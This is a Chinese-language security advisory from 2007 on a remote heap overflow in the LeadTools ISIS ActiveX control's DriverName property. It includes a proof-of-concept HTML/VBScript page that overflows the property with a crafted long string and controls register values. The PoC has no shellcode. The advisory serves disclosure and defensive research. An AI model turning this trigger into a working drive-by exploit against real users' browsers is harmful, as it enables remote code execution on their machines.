LeadTools ISIS控件远程堆溢出漏洞
发布日期:2007-05-22
更新日期:2007-05-23
受影响系统:LeadTools ISIS ActiveX 14.5.0.44
描述:
BUGTRAQ ID:
24093
LeadTools ISIS是一款高速的文档扫描工具。
LEAD ISIS控件(ltisi14E.ocx)的实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户机器。
LEAD ISIS控件在处理DriverName属性时存在堆溢出漏洞。如果用户受骗访问了恶意站点并向该属性分配了超长字符串的话,就可能触发这个溢出,导致执行任意代码。
<*来源:shinnai (
shinnai@autistici.org)
链接:
http://secunia.com/advisories/25349/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/22</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------
<b>LeadTools ISIS Control (ltisi14E.ocx v. 14.5.0.44) Remote Buffer Overflow Exploit</b>
url:
http://www.leadtools.com/
price: eheheh, take a look at thier site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site:
http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.
-----------------------------------------------------------------------------------
<object classid='clsid:00140050-B1BA-11CE-ABC6-F5B2E79D9E3F' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
buff = String(752, "A")
get_EAX = "aaaa"
get_EDI = "bbbb"
buff1 = String(7240, "B")
egg = buff + get_EDI + get_EAX + buff1
test.DriverName = egg
End Sub
</script>
</span></span>
</code></pre>
建议:
厂商补丁:
LeadTools
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.pds-site.com/LEAD/SDK/Document/document-isis-scanning.htm浏览次数:3039
严重程度:0(网友投票)